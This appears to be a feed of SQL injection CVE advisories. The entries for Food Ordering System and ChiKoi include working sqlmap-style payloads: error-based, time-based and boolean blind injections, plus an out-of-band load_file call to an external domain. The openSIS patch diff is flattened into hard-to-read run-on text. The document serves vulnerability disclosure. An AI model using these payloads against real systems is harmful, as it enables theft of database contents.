Food Ordering System v2.0 was discovered to contain a SQL injection vulnerability via the email parameter.

The email parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the email parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. The attacker can steal all information from the database of this system.

\--\-
Parameter: email (POST)
    Type: error\-based
    Title: MySQL \>= 5.0 AND error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: email\=oUTxWXtc@burpcollaborator.net' AND (SELECT 5169 FROM(SELECT COUNT(\*),CONCAT(0x716b627171,(SELECT (ELT(5169=5169,1))),0x71786b7171,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)# bwyS&password=r4Q!t5u!L4
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=oUTxWXtc@burpcollaborator.net' AND (SELECT 1469 FROM (SELECT(SLEEP(3)))aKuf)# bETJ&password=r4Q!t5u!L4
\--\-

CVE-2023-24647: CVE-nu11secur1ty/vendors/oretnom23/2023/Food-Ordering-System-v2.0/SQLi at main · nu11secur1ty/CVE-nu11secur1ty

ChiKoi v1.0 was discovered to contain a SQL injection vulnerability via the load_file function.

**ChiKoi-1.0-SQLi****Vendor**

**Description:**

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload '+(select load\_file('\\\\v3z9cjkbngnzrm7piruwhl6olfr8fzknbqzlmba0.glumar.com\\quv'))+' was submitted in the User-Agent HTTP header. This payload injects a SQL sub-query that calls MySQL's load\_file function with a UNC file path that references a URL on an external domain. The attacker can steal all information from this system and can seriously harm the users of this system, such as extracting bank accounts through which they pay each other, etc.

**STATUS: HIGH Vulnerability - CRITICAL**

\[+\] Payload:

\--\-
Parameter: User\-Agent (User\-Agent)
    Type: boolean\-based blind
    Title: AND boolean\-based blind \- WHERE or HAVING clause (subquery \- comment)
    Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 2474=2474 AND 9291=(SELECT (CASE WHEN (9291=9291) THEN 9291 ELSE (SELECT 4553 UNION SELECT 6994) END))-- -
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 4578\=4578 AND (SELECT 8224 FROM(SELECT COUNT(\*),CONCAT(0x71706b7171,(SELECT (ELT(8224\=8224,1))),0x716a6a6271,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- VCWR
\--\-

**Reproduce:**

href

**Proof and Exploit:**

href

**Time spent**

01:30:00

**Writing an exploit**

00:05:00

**In real time:**

\[+\] Online:

\--\-
Parameter: User\-Agent (User\-Agent)
    Type: boolean\-based blind
    Title: AND boolean\-based blind \- WHERE or HAVING clause (subquery \- comment)
    Payload: Mozilla/5.0 (X11; U; Linux x86\_64; en\-US; rv:1.8.1) Gecko/20060601 Firefox/2.0 (Ubuntu\-edgy)' WHERE 8386=8386 AND 8264=(SELECT (CASE WHEN (8264=8264) THEN 8264 ELSE (SELECT 2322 UNION SELECT 6426) END))-- -
\---

CVE-2023-24084: CVE-nu11secur1ty/vendors/tanhongit/2023/ChiKoi at main · nu11secur1ty/CVE-nu11secur1ty

Open Solutions for Education, Inc openSIS Community Edition v8.0 and earlier is vulnerable to SQL Injection via CalendarModal.php.

@@ -28,7 +28,7 @@ #\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*  
session\_start(); !empty($\_SESSION\['USERNAME'\]) or die('Access denied!'); //!empty($\_SESSION\['PROFILE\_ID'\]) or die('Access denied!');  
include "functions/ParamLibFnc.php"; echo '<script type="text/javascript" src="assets/js/pages/components\_popups.js"></script>'; @@ -99,14 +99,13 @@ if ($url === FALSE) { header('Location: index.php'); } error\_reporting(E\_ERROR); $isajax = "ajax"; $start\_time = time(); include 'Warehouse.php'; array\_rwalk($\_REQUEST, 'strip\_tags'); $title\_set = '';  
if (UserStudentID() && User('PROFILE') != 'parent' && User('PROFILE') != 'student' && substr(clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS), 0, 5) != 'Atten' && substr(clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS), 0, 5) != 'users' && clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) != 'students/AddUsers.php' && $\_REQUEST\['modname'\]!= 'tools/Backup.php' && (substr(clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS), 0, 10) != 'attendance' || clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) == 'attendance/StudentSummary.php' || clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) == 'attendance/DailySummary.php' || clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) == 'attendance/AddAbsences.php')) { if (UserStudentID() && User('PROFILE') != 'parent' && User('PROFILE') != 'student' && substr(clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS), 0, 5) != 'Atten' && substr(clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS), 0, 5) != 'users' && clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) != 'students/AddUsers.php' && $\_REQUEST\['modname'\] != 'tools/Backup.php' && (substr(clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS), 0, 10) != 'attendance' || clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) == 'attendance/StudentSummary.php' || clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) == 'attendance/DailySummary.php' || clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) == 'attendance/AddAbsences.php')) { $RET = DBGet(DBQuery("SELECT FIRST\_NAME,LAST\_NAME,MIDDLE\_NAME,NAME\_SUFFIX FROM students WHERE STUDENT\_ID='" . UserStudentID() . "'")); $count\_student\_RET = DBGet(DBQuery("SELECT COUNT(\*) AS NUM FROM students"));  
@@ -125,8 +124,8 @@ 'students/EnrollmentReport.php', // For Scheduling // 'scheduling/Schedule.php', 'scheduling/ViewSchedule.php', 'scheduling/Requests.php', 'scheduling/ViewSchedule.php', 'scheduling/Requests.php', // 'scheduling/MassSchedule.php', // 'scheduling/MassRequests.php', 'scheduling/PrintSchedules.php', @@ -141,7 +140,7 @@ 'grades/AdminProgressReports.php', 'grades/ProgressReports.php', // 'grades/HonorRoll.php', 'grades/EditReportCardGrades.php', 'grades/EditReportCardGrades.php', // 'grades/GraduationProgress.php', // For Attendance 'attendance/AddAbsences.php', @@ -156,37 +155,32 @@  
$allow\_back\_to\_student\_list = array( // For Students 'students/Student.php', 'students/Student.php', // For Scheduling // 'scheduling/Schedule.php', 'scheduling/ViewSchedule.php', 'scheduling/Requests.php', 'scheduling/ViewSchedule.php', 'scheduling/Requests.php', // For Grades 'grades/EditReportCardGrades.php', 'grades/EditReportCardGrades.php', // For Eligibility 'eligibility/Student.php' );  
if ($count\_student\_RET\[1\]\['NUM'\] > 1) { $title\_set = 'y';  
if(in\_array($\_REQUEST\['modname'\], $allow\_buffer\_list)) { if(in\_array($\_REQUEST\['modname'\], $allow\_back\_to\_student\_list)) { DrawHeaderHome('<div class="panel"><div class="panel-heading"><h6 class="panel-title">'.\_selectedStudent.' : ' . $RET\[1\]\['FIRST\_NAME'\] . '&nbsp;' . ($RET\[1\]\['MIDDLE\_NAME'\] ? $RET\[1\]\['MIDDLE\_NAME'\] . ' ' : '') . $RET\[1\]\['LAST\_NAME'\] . '&nbsp;' . $RET\[1\]\['NAME\_SUFFIX'\] . '</h6> <div class="heading-elements clearfix"><span class="heading-text"><A HREF=Modules.php?modname=' . clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) . '&search\_modfunc=list&next\_modname=Students/Student.php&ajax=true&bottom\_back=true&return\_session=true target=body><i class="icon-square-left"></i> '.\_backToStudentList.'</A></span><div class="btn-group heading-btn"><A HREF=SideForStudent.php?student\_id=new&modcat=' . clean\_param($\_REQUEST\['modcat'\], PARAM\_NOTAGS) . '&modname=' . $\_REQUEST\['modname'\] . ' class="btn btn-danger btn-xs">'.\_deselect.'</A></div></div></div></div>'); } else { DrawHeaderHome('<div class="panel"><div class="panel-heading"><h6 class="panel-title">'.\_selectedStudent.' : ' . $RET\[1\]\['FIRST\_NAME'\] . '&nbsp;' . ($RET\[1\]\['MIDDLE\_NAME'\] ? $RET\[1\]\['MIDDLE\_NAME'\] . ' ' : '') . $RET\[1\]\['LAST\_NAME'\] . '&nbsp;' . $RET\[1\]\['NAME\_SUFFIX'\] . '</h6> <div class="heading-elements clearfix"><div class="btn-group heading-btn"><A HREF=SideForStudent.php?student\_id=new&modcat=' . clean\_param($\_REQUEST\['modcat'\], PARAM\_NOTAGS) . '&modname=' . $\_REQUEST\['modname'\] . ' class="btn btn-danger btn-xs">'.\_deselect.'</A></div></div></div></div>'); if (in\_array($\_REQUEST\['modname'\], $allow\_buffer\_list)) { if (in\_array($\_REQUEST\['modname'\], $allow\_back\_to\_student\_list)) { DrawHeaderHome('<div class="panel"><div class="panel-heading"><h6 class="panel-title">' . \_selectedStudent . ' : ' . $RET\[1\]\['FIRST\_NAME'\] . '&nbsp;' . ($RET\[1\]\['MIDDLE\_NAME'\] ? $RET\[1\]\['MIDDLE\_NAME'\] . ' ' : '') . $RET\[1\]\['LAST\_NAME'\] . '&nbsp;' . $RET\[1\]\['NAME\_SUFFIX'\] . '</h6> <div class="heading-elements clearfix"><span class="heading-text"><A HREF=Modules.php?modname=' . clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) . '&search\_modfunc=list&next\_modname=Students/Student.php&ajax=true&bottom\_back=true&return\_session=true target=body><i class="icon-square-left"></i> ' . \_backToStudentList . '</A></span><div class="btn-group heading-btn"><A HREF=SideForStudent.php?student\_id=new&modcat=' . clean\_param($\_REQUEST\['modcat'\], PARAM\_NOTAGS) . '&modname=' . $\_REQUEST\['modname'\] . ' class="btn btn-danger btn-xs">' . \_deselect . '</A></div></div></div></div>'); } else { DrawHeaderHome('<div class="panel"><div class="panel-heading"><h6 class="panel-title">' . \_selectedStudent . ' : ' . $RET\[1\]\['FIRST\_NAME'\] . '&nbsp;' . ($RET\[1\]\['MIDDLE\_NAME'\] ? $RET\[1\]\['MIDDLE\_NAME'\] . ' ' : '') . $RET\[1\]\['LAST\_NAME'\] . '&nbsp;' . $RET\[1\]\['NAME\_SUFFIX'\] . '</h6> <div class="heading-elements clearfix"><div class="btn-group heading-btn"><A HREF=SideForStudent.php?student\_id=new&modcat=' . clean\_param($\_REQUEST\['modcat'\], PARAM\_NOTAGS) . '&modname=' . $\_REQUEST\['modname'\] . ' class="btn btn-danger btn-xs">' . \_deselect . '</A></div></div></div></div>'); } } } else if ($count\_student\_RET\[1\]\['NUM'\] == 1) { $title\_set = 'y';  
if(in\_array($\_REQUEST\['modname'\], $allow\_buffer\_list)) { DrawHeaderHome('<div class="panel"><div class="panel-heading"><h6 class="panel-title">'.\_selectedStudent.' : ' . $RET\[1\]\['FIRST\_NAME'\] . '&nbsp;' . ($RET\[1\]\['MIDDLE\_NAME'\] ? $RET\[1\]\['MIDDLE\_NAME'\] . ' ' : '') . $RET\[1\]\['LAST\_NAME'\] . '&nbsp;' . $RET\[1\]\['NAME\_SUFFIX'\] . '</h6> <div class="heading-elements clearfix"><A HREF=SideForStudent.php?student\_id=new&modcat=' . clean\_param($\_REQUEST\['modcat'\], PARAM\_NOTAGS) . '&modname=' . $\_REQUEST\['modname'\] . ' class="btn btn-danger btn-xs">'.\_deselect.'</A></div></div></div>'); if (in\_array($\_REQUEST\['modname'\], $allow\_buffer\_list)) { DrawHeaderHome('<div class="panel"><div class="panel-heading"><h6 class="panel-title">' . \_selectedStudent . ' : ' . $RET\[1\]\['FIRST\_NAME'\] . '&nbsp;' . ($RET\[1\]\['MIDDLE\_NAME'\] ? $RET\[1\]\['MIDDLE\_NAME'\] . ' ' : '') . $RET\[1\]\['LAST\_NAME'\] . '&nbsp;' . $RET\[1\]\['NAME\_SUFFIX'\] . '</h6> <div class="heading-elements clearfix"><A HREF=SideForStudent.php?student\_id=new&modcat=' . clean\_param($\_REQUEST\['modcat'\], PARAM\_NOTAGS) . '&modname=' . $\_REQUEST\['modname'\] . ' class="btn btn-danger btn-xs">' . \_deselect . '</A></div></div></div>'); } } } @@ -199,7 +193,7 @@ if ($\_REQUEST\['modname'\] != 'users/User.php') { $RET = DBGet(DBQuery("SELECT FIRST\_NAME,LAST\_NAME FROM staff WHERE STAFF\_ID='" . UserStaffID() . "'")); echo '<div class="panel panel-default">'; DrawHeader(''.\_selectedStaff.' : ' . $RET\[1\]\['FIRST\_NAME'\] . '&nbsp;' . $RET\[1\]\['LAST\_NAME'\], '<span class="heading-text"><A HREF=Modules.php?modname=' . clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) . '&search\_modfunc=list&next\_modname=users/User.php&ajax=true&bottom\_back=true&return\_session=true target=body><i class="icon-square-left"></i> '.\_backToUserList.'</A></span><div class="btn-group heading-btn"><A HREF=Side.php?staff\_id=new&modcat=' . clean\_param($\_REQUEST\['modcat'\], PARAM\_NOTAGS) . ' class="btn btn-danger btn-xs">'.\_deselect.'</A></div>'); DrawHeader('' . \_selectedStaff . ' : ' . $RET\[1\]\['FIRST\_NAME'\] . '&nbsp;' . $RET\[1\]\['LAST\_NAME'\], '<span class="heading-text"><A HREF=Modules.php?modname=' . clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) . '&search\_modfunc=list&next\_modname=users/User.php&ajax=true&bottom\_back=true&return\_session=true target=body><i class="icon-square-left"></i> ' . \_backToUserList . '</A></span><div class="btn-group heading-btn"><A HREF=Side.php?staff\_id=new&modcat=' . clean\_param($\_REQUEST\['modcat'\], PARAM\_NOTAGS) . ' class="btn btn-danger btn-xs">' . \_deselect . '</A></div>'); echo '</div>'; } } @@ -208,10 +202,10 @@ if (!isset($\_REQUEST\['\_openSIS\_PDF'\])) { Warehouse('header');  
// if (strpos(clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS), 'miscellaneous/') === false) // echo '<script language="JavaScript">if(window == top && (!window.opener || window.opener.location.href.substring(0,(window.opener.location.href.indexOf("&")!=-1?window.opener.location.href.indexOf("&"):window.opener.location.href.replace("#","").length))!=window.location.href.substring(0,(window.location.href.indexOf("&")!=-1?window.location.href.indexOf("&"):window.location.href.replace("#","").length)))) window.location.href = "index.php";</script>'; echo "<BODY marginwidth=0 leftmargin=0 border=0 onload='doOnload();' background=assets/bg.gif>"; echo '<DIV id="Migoicons" style="visibility:hidden;position:absolute;z-index:1000;top:-100"></DIV>'; if (strpos(clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS), 'miscellaneous/') === false) echo '<script language="JavaScript">if(window == top && (!window.opener || window.opener.location.href.substring(0,(window.opener.location.href.indexOf("&")!=-1?window.opener.location.href.indexOf("&"):window.opener.location.href.replace("#","").length))!=window.location.href.substring(0,(window.location.href.indexOf("&")!=-1?window.location.href.indexOf("&"):window.location.href.replace("#","").length)))) window.location.href = "index.php";</script>'; // echo "<BODY marginwidth=0 leftmargin=0 border=0 onload='doOnload();' background=assets/bg.gif>"; // echo '<DIV id="Migoicons" style="visibility:hidden;position:absolute;z-index:1000;top:-100"></DIV>'; }  
$ajax\_to\_sign\_in = ""; @@ -261,8 +255,7 @@  
if (preg\_match('/\\.\\./', $modname) !== 1) include 'modules/' . $modname; } else { } else { if (User('USERNAME')) {  
  
@@ -273,7 +266,7 @@ }  
  
echo "".\_youReNotAllowedToUseThisProgram."! ".\_thisAttemptedViolationHasBeenLoggedAndYourIpAddressWasCaptured."."; echo "" . \_youReNotAllowedToUseThisProgram . "! " . \_thisAttemptedViolationHasBeenLoggedAndYourIpAddressWasCaptured . "."; DBQuery("INSERT INTO hacking\_log (HOST\_NAME,IP\_ADDRESS,LOGIN\_DATE,VERSION,PHP\_SELF,DOCUMENT\_ROOT,SCRIPT\_NAME,MODNAME,USERNAME) values('$\_SERVER\[SERVER\_NAME\]','$ip','" . date('Y-m-d') . "','$openSISVersion','$\_SERVER\[PHP\_SELF\]','$\_SERVER\[DOCUMENT\_ROOT\]','$\_SERVER\[SCRIPT\_NAME\]','$\_REQUEST\[modname\]','" . User('USERNAME') . "')"); Warehouse('footer'); if ($openSISNotifyAddress) @@ -302,7 +295,8 @@ echo '</HTML>'; }  
function decode\_unicode\_url($str) { function decode\_unicode\_url($str) { $res = '';  
$i = 0; @@ -317,11 +311,11 @@ function decode\_unicode\_url($str) { $character = chr($value); else if ($value < 0x0800) // 2 bytes: 110xxxxx 10xxxxxx $character = chr((($value & 0x07c0) >> 6) | 0xc0) . chr(($value & 0x3f) | 0x80); . chr(($value & 0x3f) | 0x80); else // 3 bytes: 1110xxxx 10xxxxxx 10xxxxxx $character = chr((($value & 0xf000) >> 12) | 0xe0) . chr((($value & 0x0fc0) >> 6) | 0x80) . chr(($value & 0x3f) | 0x80); . chr((($value & 0x0fc0) >> 6) | 0x80) . chr(($value & 0x3f) | 0x80); } else $i++;  
@@ -331,21 +325,23 @@ function decode\_unicode\_url($str) { return $res . substr($str, $i); }  
function code2utf($num) { function code2utf($num) { if ($num < 128) return chr($num); if ($num < 1024) return chr(($num >> 6) + 192) . chr(($num & 63) + 128); if ($num < 32768) return chr(($num >> 12) + 224) . chr((($num >> 6) & 63) + 128) . chr(($num & 63) + 128); . chr(($num & 63) + 128); if ($num < 2097152) return chr(($num >> 18) + 240) . chr((($num >> 12) & 63) + 128) . chr((($num >> 6) & 63) + 128) . chr(($num & 63) + 128); . chr((($num >> 6) & 63) + 128) . chr(($num & 63) + 128); return ''; }  
function unescape($strIn, $iconv\_to = 'UTF-8') { function unescape($strIn, $iconv\_to = 'UTF-8') { $strOut = ''; $iPos = 0; $len = strlen($strIn); @@ -382,5 +378,3 @@ function unescape($strIn, $iconv\_to = 'UTF-8') { } return $strOut; }  
?>

CVE-2022-45962: Version 9.0 release · OS4ED/openSIS-Classic@81799fd

The ownCloud Android app allows ownCloud users to access, share, and edit files and folders. Prior to version 3.0, the app has an incomplete fix for a path traversal issue and is vulnerable to two bypass methods. The bypasses may lead to information disclosure when uploading the app’s internal files, and to arbitrary file write when uploading plain text files (although limited by the .txt extension). Version 3.0 fixes the reported bypasses.

CVE-2023-24804: GHSL-2022-059_GHSL-2022-060: SQL injection vulnerabilities in Owncloud Android app - CVE-2023-24804, CVE-2023-23948

The Simple URLs WordPress plugin before 115 does not escape some parameters before using them in various SQL statements used by AJAX actions available by any authenticated users, leading to a SQL injection exploitable by low privilege users such as subscriber.

CVE-2023-0098

The WP Yelp Review Slider WordPress plugin before 7.1 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber.

CVE-2023-0263

The WP Airbnb Review Slider WordPress plugin before 3.3 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber.

CVE-2023-0262

The WP TripAdvisor Review Slider WordPress plugin before 10.8 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber.

CVE-2023-0261

The WP Review Slider WordPress plugin before 12.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber.

CVE-2023-0260

The WP Google Review Slider WordPress plugin before 11.8 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber.

Tag

#sql